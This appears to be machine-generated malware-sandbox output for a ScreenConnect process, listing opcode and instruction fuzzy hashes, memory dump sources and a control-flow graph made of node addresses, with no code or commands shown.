                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1d01af54296f9ae980b71b2b87b8d2b8dce2967dcc44c7ac35473ffa0adbb8e0
                                                                                                                          • Instruction ID: 2b2b6d95a172181803e045b631f7287ef3f3c4c64a9cb5b77bcbedb0b733c943
                                                                                                                          • Opcode Fuzzy Hash: 1d01af54296f9ae980b71b2b87b8d2b8dce2967dcc44c7ac35473ffa0adbb8e0
                                                                                                                          • Instruction Fuzzy Hash: 91F0AE71700711AB8716AA9FB85095F7BDEEFC8A513048429E529C7315EF61FC054BE0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5872f6fcbc8f7aa35d18f0e3ebc776fcf57aca5a903c2bf50bc91fee78120910
                                                                                                                          • Instruction ID: 012fc5857d1b2ae8389cecddbafa58dceaf182d45271df7f7ddcbf2e29b187ff
                                                                                                                          • Opcode Fuzzy Hash: 5872f6fcbc8f7aa35d18f0e3ebc776fcf57aca5a903c2bf50bc91fee78120910
                                                                                                                          • Instruction Fuzzy Hash: 0BF0E5327047506BD7141EAEB4D815E7FEAEBC9AA5714407EDA09C7342DD268C0B8751
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 943a75181f0970e66840192b60a1459fefd778f333aebed211972859458f85ad
                                                                                                                          • Instruction ID: 124605e698229497ba025e3509d818d368251f703f7b711bb19829bfe68194c6
                                                                                                                          • Opcode Fuzzy Hash: 943a75181f0970e66840192b60a1459fefd778f333aebed211972859458f85ad
                                                                                                                          • Instruction Fuzzy Hash: A0F04974D05248EFCB05EFA8E9812DCBBB0FB00201F5040A9C509E7651D7322F85DB52
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: dcb3bf7c6d595a0d8e4ee8d17db4f7d1ffbd91d4801a15d8e9f1e2604c3e14bb
                                                                                                                          • Instruction ID: 98563fafc7b970c4d1bcd50cb0d0626936b438ea3a97613daa5f8448dc5faae5
                                                                                                                          • Opcode Fuzzy Hash: dcb3bf7c6d595a0d8e4ee8d17db4f7d1ffbd91d4801a15d8e9f1e2604c3e14bb
                                                                                                                          • Instruction Fuzzy Hash: A7F0E274E00208EFDB04EFA8D98569CBBF5FB44245F6044A8D909A7254DB326E84DB52
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fbd742c03abb7fde6091a0bc8597d5857eb85cfc3e3ab926e26eb2cf49485565
                                                                                                                          • Instruction ID: 5c6f89a770d7890c8bd7704ea314e840645c0024a2e04d1adab7c61ce0885c35
                                                                                                                          • Opcode Fuzzy Hash: fbd742c03abb7fde6091a0bc8597d5857eb85cfc3e3ab926e26eb2cf49485565
                                                                                                                          • Instruction Fuzzy Hash: 4BF0A032A0E3949ED7168FB9581059A7FE98F86114718C0AFD48CC7142E8309902C766
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 864bcf8bb0e900e53b3c7fd89f55c87279c435194300a88469d72119913c3840
                                                                                                                          • Instruction ID: 1ef1a3ad6312b592a1b7a4452c8dcf8afe67044f116d4062b9ac6fe46d8c2401
                                                                                                                          • Opcode Fuzzy Hash: 864bcf8bb0e900e53b3c7fd89f55c87279c435194300a88469d72119913c3840
                                                                                                                          • Instruction Fuzzy Hash: B6F03A75B005258FDB55DF6DC454AAABBE6EF88350B048069E909CB354EB35DE01CB80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: be088bb43b4bd9f922dad7b516baeb1a567bd390102560c1b1c479a680ca933a
                                                                                                                          • Instruction ID: 1277153409eaf0b6f3cf0ed8c44473f6d17fd7459454e7d96675f8d7363aa04d
                                                                                                                          • Opcode Fuzzy Hash: be088bb43b4bd9f922dad7b516baeb1a567bd390102560c1b1c479a680ca933a
                                                                                                                          • Instruction Fuzzy Hash: 0CE0657AB042186F4B04CA4ED800D6FBBAEDFC9220718C026F809C7305D932DD1187A4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 033124ad39bb4aef8f9d5a8f35a343bb2f4dcd055e741baef092849ac0fea7f7
                                                                                                                          • Instruction ID: ea496a4d7e588f71a85fbf66376ef46c5cfa5191037ef43386dfd73b9e4da70a
                                                                                                                          • Opcode Fuzzy Hash: 033124ad39bb4aef8f9d5a8f35a343bb2f4dcd055e741baef092849ac0fea7f7
                                                                                                                          • Instruction Fuzzy Hash: 79F0A0722043105BC3116B79A40908E3F9AFFD2756754896FE609CB309EE72DE0A4BE1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b6fbf6463ecf27306d3895bfb1d00a39c9f82b427c56cc1be72e272011ddf656
                                                                                                                          • Instruction ID: 6e7df1d83f080bed3dadf08a0aa04740069d3ea3e505b2abd56ce6697f4d5af9
                                                                                                                          • Opcode Fuzzy Hash: b6fbf6463ecf27306d3895bfb1d00a39c9f82b427c56cc1be72e272011ddf656
                                                                                                                          • Instruction Fuzzy Hash: 7FE0ED323022101BC3006A7CB8680DD7FAAFFDE2223040167E506C3381CE25AE0BD392
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cc030c35942b876c1acbeaec5ec57fe104099a3fb64d89354eb01d1adfcf54ca
                                                                                                                          • Instruction ID: dbb13c91756528f832c94ecddd04800c16eddc5053651250014ef7f7aef4555b
                                                                                                                          • Opcode Fuzzy Hash: cc030c35942b876c1acbeaec5ec57fe104099a3fb64d89354eb01d1adfcf54ca
                                                                                                                          • Instruction Fuzzy Hash: 42E022B2D083043BCB09ABADA8514DDBFB8EF86220B0400ABD048D7252EC325A468396
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d41637b78cfbde1b371b1effe58ee0f78fb51a8d34a3a56ff78bebeb1c2d5d84
                                                                                                                          • Instruction ID: 2bebb132d4bf6f7b5253a3e14a4c50371a2cbc0646a655dd991a384bc5662317
                                                                                                                          • Opcode Fuzzy Hash: d41637b78cfbde1b371b1effe58ee0f78fb51a8d34a3a56ff78bebeb1c2d5d84
                                                                                                                          • Instruction Fuzzy Hash: 5FF0B271E002199F8B40DFADC84169EFBF5EF49200B20816AD918EB211E331AA12CB80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b3574c9665b505d8c12c4faaf5bbeb4a983e983af7185e405e302ad4902a5559
                                                                                                                          • Instruction ID: f6e64ae16796959bb13df9d6e7982d38e49d017c6a5b76d9d8014155fd1731c8
                                                                                                                          • Opcode Fuzzy Hash: b3574c9665b505d8c12c4faaf5bbeb4a983e983af7185e405e302ad4902a5559
                                                                                                                          • Instruction Fuzzy Hash: 39E02631300710AB97242AAF749842EBBDFEBC8AA1754003EE60AC3300DE7ADC0A4791
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0baa1eb5c031042b9defbfa6ae98ff169346ef654c4696bc83071290aa55821d
                                                                                                                          • Instruction ID: 6537456527b6feb33cb3f390d32f7397083d5fdee2233e97047fdb661a5f5d0b
                                                                                                                          • Opcode Fuzzy Hash: 0baa1eb5c031042b9defbfa6ae98ff169346ef654c4696bc83071290aa55821d
                                                                                                                          • Instruction Fuzzy Hash: 45E048322006105B8315676DA40549E779AFFD6752754892FE60ACB304DE72EE4A4FD1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1ba31ef9d90be065e38fa78f137b6895d267385b4b802a56f3e344a4f3169def
                                                                                                                          • Instruction ID: d245a81fb94287609294664224edcb69afb3be292da115b8d04aff1b5aaac3b7
                                                                                                                          • Opcode Fuzzy Hash: 1ba31ef9d90be065e38fa78f137b6895d267385b4b802a56f3e344a4f3169def
                                                                                                                          • Instruction Fuzzy Hash: CDE026323012012BC308A56AE880957B3AEEBCC764B100479D10CC7319CD729C8382A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 25def29cd89c20ef0e7ff5f19cf3de2f47cff051540198a551172e9f9208a027
                                                                                                                          • Instruction ID: 590e56b012a3daced6d926b73f912854e44aa09cd298f8db334a61943014968d
                                                                                                                          • Opcode Fuzzy Hash: 25def29cd89c20ef0e7ff5f19cf3de2f47cff051540198a551172e9f9208a027
                                                                                                                          • Instruction Fuzzy Hash: C4E086327016016FC718A66AE8909ABB3BAEBDD764B20447ED50DD7359CE768C83C750
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fe92d6516c63d95a56ae1b1fc7097dcad4702f683255274bf23a72fc667e0b88
                                                                                                                          • Instruction ID: a17f5fa0d049eca5d9c0a8f08f87d647e31f5d0b142ae60ed55bf7a142736b57
                                                                                                                          • Opcode Fuzzy Hash: fe92d6516c63d95a56ae1b1fc7097dcad4702f683255274bf23a72fc667e0b88
                                                                                                                          • Instruction Fuzzy Hash: 4CE022212093D10FC722D768F8405CD3FE1AFD2200B0809DAE04097107CB66AB4B83D1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: eb95b169b81395d91d0d65b5d16a670815a95fde054041a2a8cb8ef9df452833
                                                                                                                          • Instruction ID: 842b039ceacd30d0f82ff9164d11e33c240a6f06fbc40cf9d5d775bec0a878a3
                                                                                                                          • Opcode Fuzzy Hash: eb95b169b81395d91d0d65b5d16a670815a95fde054041a2a8cb8ef9df452833
                                                                                                                          • Instruction Fuzzy Hash: 7BE0C2363012106B8304677DE80886E7BDAFFDD2313104126E90AC3384CE34EC0AE7A7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f1e1309cceb7a852dd12781c6a91868a65cce047511085219a9f4094d4b36eab
                                                                                                                          • Instruction ID: 049367c87357dba2c987182ec748f8e904cf8fe58aa0a427dec4acb55b334bf7
                                                                                                                          • Opcode Fuzzy Hash: f1e1309cceb7a852dd12781c6a91868a65cce047511085219a9f4094d4b36eab
                                                                                                                          • Instruction Fuzzy Hash: EDE0D875D052449FC740DFB8EA515CCB7B0FF05304710899EC408D7211E7315F069B41
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4c06fc9ce23dda67f17021e6119a1f68cfc830ef4608b09b5060e89b60852f3b
                                                                                                                          • Instruction ID: 21e345302dd0fbd8e2283d3e42a0afc5debac06952fc37c72cf93c9f5307ff2c
                                                                                                                          • Opcode Fuzzy Hash: 4c06fc9ce23dda67f17021e6119a1f68cfc830ef4608b09b5060e89b60852f3b
                                                                                                                          • Instruction Fuzzy Hash: 23E0467090D381AFC342AF38A914149BFF0BE06204B0648AED8C9C7252E235AD0ACB62
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8c624b8d5a2a2efc4d866ff43bd8b3095b2d2ddc3c61fc4959e7b7418c182af5
                                                                                                                          • Instruction ID: a2ea19bc1821d0f1132718cb2f0e225cd2a8e551f48afcccb342bba0dce1a054
                                                                                                                          • Opcode Fuzzy Hash: 8c624b8d5a2a2efc4d866ff43bd8b3095b2d2ddc3c61fc4959e7b7418c182af5
                                                                                                                          • Instruction Fuzzy Hash: 51E01A31959385DFC741EF38E648159BBF0AF46200B49889ED889C7201E630A949DB52
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5a0f0369f480fe2fc8e60cfe870769737730abac6df7e83b92ce41af057f32e7
                                                                                                                          • Instruction ID: 2d1babe292b48f1d40b0ef7b016ee5693d1c2dbf4b4b9fda0c85070702287836
                                                                                                                          • Opcode Fuzzy Hash: 5a0f0369f480fe2fc8e60cfe870769737730abac6df7e83b92ce41af057f32e7
                                                                                                                          • Instruction Fuzzy Hash: A2E086318047489FC701BF68D459499FBB4EE95200B05C69AE88D5B113FB70D595D782
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2269570bdbddf6217334afd51f1c828b3c5e005687214d4223eb459cd69165a5
                                                                                                                          • Instruction ID: c1c1571d2998c937a6f67c5284183d1372b6d3bae1de82b4dd3ba298ffcacaa6
                                                                                                                          • Opcode Fuzzy Hash: 2269570bdbddf6217334afd51f1c828b3c5e005687214d4223eb459cd69165a5
                                                                                                                          • Instruction Fuzzy Hash: 19D01271901108EFCB04EFA8E94095DB7F5EB45305B108599D908D3304DA316F049B51
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e02108b9ca650668ad5ee6ac2178054db7a92e01c73fdf7da980b5851e49c2d5
                                                                                                                          • Instruction ID: b7867f2f98a6134b1b1b45820ed6a05fa4db226442fbff4680339264ea96d991
                                                                                                                          • Opcode Fuzzy Hash: e02108b9ca650668ad5ee6ac2178054db7a92e01c73fdf7da980b5851e49c2d5
                                                                                                                          • Instruction Fuzzy Hash: E8D0C73181470D9DC700BB78D454469F778EED5200F00D65AE44D57111FF70D6D0D681
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: dbfe967035c4bb6032030ef13254c822f0ff93e0fc8929af2aa5e22f324c5a98
                                                                                                                          • Instruction ID: d74f871abe74d25de221bb565f8a79810eeed3a931e3140bf9c058ae5bba08ed
                                                                                                                          • Opcode Fuzzy Hash: dbfe967035c4bb6032030ef13254c822f0ff93e0fc8929af2aa5e22f324c5a98
                                                                                                                          • Instruction Fuzzy Hash: 4FD0172200E3C86FDF13CFA9A1A05943FB0A903220308E48AC444D6466D1798545CF22
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 90914831e188827bec8fb6699bd0399d0e9162b9d4fb3fdc093ca0e1bd9b8edc
                                                                                                                          • Instruction ID: e413b76829ce511345703c63ff0569b35dd3d5bbca212faf01176842e92940fb
                                                                                                                          • Opcode Fuzzy Hash: 90914831e188827bec8fb6699bd0399d0e9162b9d4fb3fdc093ca0e1bd9b8edc
                                                                                                                          • Instruction Fuzzy Hash: 3BB011302000008B8288CA08C880808F3A2ABE8308328C0AEA808CB20ACF33E803CA08

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:13.3%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:5
                                                                                                                          Total number of Limit Nodes:1
                                                                                                                          execution_graph 11662 7ffd9b8a8014 11664 7ffd9b8a801d 11662->11664 11663 7ffd9b8a8082 11664->11663 11665 7ffd9b8a80f6 SetProcessMitigationPolicy 11664->11665 11666 7ffd9b8a8152 11665->11666

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 810 7ffd9bbb5a21-7ffd9bbb5a54 call 7ffd9bbb41a0 call 7ffd9bbb0a20 * 2 818 7ffd9bbb5a5a-7ffd9bbb5a68 810->818 819 7ffd9bbb67ee-7ffd9bbb6801 810->819 821 7ffd9bbb5a6a-7ffd9bbb5a6c 818->821 822 7ffd9bbb5a6e-7ffd9bbb5a7d 818->822 823 7ffd9bbb5a80-7ffd9bbb5a82 821->823 822->823 825 7ffd9bbb5a88-7ffd9bbb5aa4 823->825 826 7ffd9bbb5bc2-7ffd9bbb5bc5 823->826 825->826 843 7ffd9bbb5aaa-7ffd9bbb5abc 825->843 827 7ffd9bbb5bcb-7ffd9bbb5bd6 826->827 828 7ffd9bbb5d00-7ffd9bbb5d07 826->828 832 7ffd9bbb5bd8-7ffd9bbb5bf5 827->832 833 7ffd9bbb5c22-7ffd9bbb5c30 827->833 829 7ffd9bbb5d97-7ffd9bbb5d9e 828->829 830 7ffd9bbb5d0d-7ffd9bbb5d14 828->830 834 7ffd9bbb5da9-7ffd9bbb5dbc 829->834 835 7ffd9bbb5da0-7ffd9bbb5da7 829->835 830->829 836 7ffd9bbb5d1a-7ffd9bbb5d24 830->836 840 7ffd9bbb680b-7ffd9bbb681c 832->840 841 7ffd9bbb5bfb-7ffd9bbb5c20 832->841 833->828 853 7ffd9bbb5dcd-7ffd9bbb5dd5 834->853 854 7ffd9bbb5dbe-7ffd9bbb5dc3 834->854 835->834 842 7ffd9bbb5de6-7ffd9bbb5ded 835->842 836->842 855 7ffd9bbb5d2a-7ffd9bbb5d43 836->855 891 7ffd9bbb681d-7ffd9bbb6825 840->891 841->833 844 7ffd9bbb5df3-7ffd9bbb5dfa 842->844 845 7ffd9bbb6051-7ffd9bbb6058 842->845 848 7ffd9bbb5b0a-7ffd9bbb5b1a 843->848 849 7ffd9bbb5abe-7ffd9bbb5adb 843->849 844->845 852 7ffd9bbb5e00-7ffd9bbb5e03 844->852 845->819 856 7ffd9bbb605e-7ffd9bbb6065 845->856 867 7ffd9bbb5ae1-7ffd9bbb5b08 849->867 868 7ffd9bbb6802-7ffd9bbb680a 849->868 860 7ffd9bbb5e05-7ffd9bbb5e07 852->860 861 7ffd9bbb5e0c-7ffd9bbb5e1a 852->861 864 7ffd9bbb5ddb-7ffd9bbb5ddf 853->864 865 7ffd9bbb6841-7ffd9bbb68f1 853->865 854->853 870 7ffd9bbb5d45-7ffd9bbb5d48 855->870 871 7ffd9bbb5d52-7ffd9bbb5d95 855->871 856->819 866 7ffd9bbb606b-7ffd9bbb607d 856->866 869 7ffd9bbb5eba-7ffd9bbb5ebd 860->869 888 7ffd9bbb5e1c 861->888 889 7ffd9bbb5e1e 861->889 864->842 872 7ffd9bbb60c9-7ffd9bbb60e1 866->872 873 7ffd9bbb607f-7ffd9bbb609c 866->873 867->848 868->840 876 7ffd9bbb5ec6-7ffd9bbb5ed4 869->876 877 7ffd9bbb5ebf-7ffd9bbb5ec1 869->877 870->871 871->842 884 7ffd9bbb682f-7ffd9bbb6840 873->884 885 7ffd9bbb60a2-7ffd9bbb60c7 873->885 904 7ffd9bbb5ed8 876->904 905 7ffd9bbb5ed6 876->905 890 7ffd9bbb5f75-7ffd9bbb5f7b 877->890 884->865 885->872 894 7ffd9bbb5e20-7ffd9bbb5e23 888->894 889->894 895 7ffd9bbb602d-7ffd9bbb602f 890->895 896 7ffd9bbb5f81-7ffd9bbb5f83 890->896 916 7ffd9bbb6826-7ffd9bbb682e 891->916 901 7ffd9bbb5e25-7ffd9bbb5e2b 894->901 902 7ffd9bbb5e2d-7ffd9bbb5e38 894->902 895->845 907 7ffd9bbb6031-7ffd9bbb6039 895->907 896->895 903 7ffd9bbb5f89-7ffd9bbb602b 896->903 910 7ffd9bbb5ea8-7ffd9bbb5eb8 901->910 911 7ffd9bbb5e3a-7ffd9bbb5e57 902->911 912 7ffd9bbb5e84-7ffd9bbb5ea5 902->912 903->845 914 7ffd9bbb5eda-7ffd9bbb5edd 904->914 905->914 907->845 917 7ffd9bbb603b-7ffd9bbb604e 907->917 910->869 911->891 928 7ffd9bbb5e5d-7ffd9bbb5e82 911->928 912->910 922 7ffd9bbb5ee7-7ffd9bbb5ef2 914->922 923 7ffd9bbb5edf-7ffd9bbb5ee5 914->923 916->884 917->845 924 7ffd9bbb5f3e-7ffd9bbb5f60 922->924 925 7ffd9bbb5ef4-7ffd9bbb5f11 922->925 931 7ffd9bbb5f63-7ffd9bbb5f73 923->931 924->931 925->916 935 7ffd9bbb5f17-7ffd9bbb5f3c 925->935 928->912 931->890 935->924
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0a1c4a5e6e3e3da179304f0ac84985920648cb56623d08a9696fdce8660deccc
                                                                                                                          • Instruction ID: 4e75406bbca98298521467d188748bf806feff616ba5df4dfe097110682cb2e5
                                                                                                                          • Opcode Fuzzy Hash: 0a1c4a5e6e3e3da179304f0ac84985920648cb56623d08a9696fdce8660deccc
                                                                                                                          • Instruction Fuzzy Hash: AB127931B0EA5E4FE7799A6894B46B677C1FF44308F4501BAD45EC71E7DD28AC028741

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
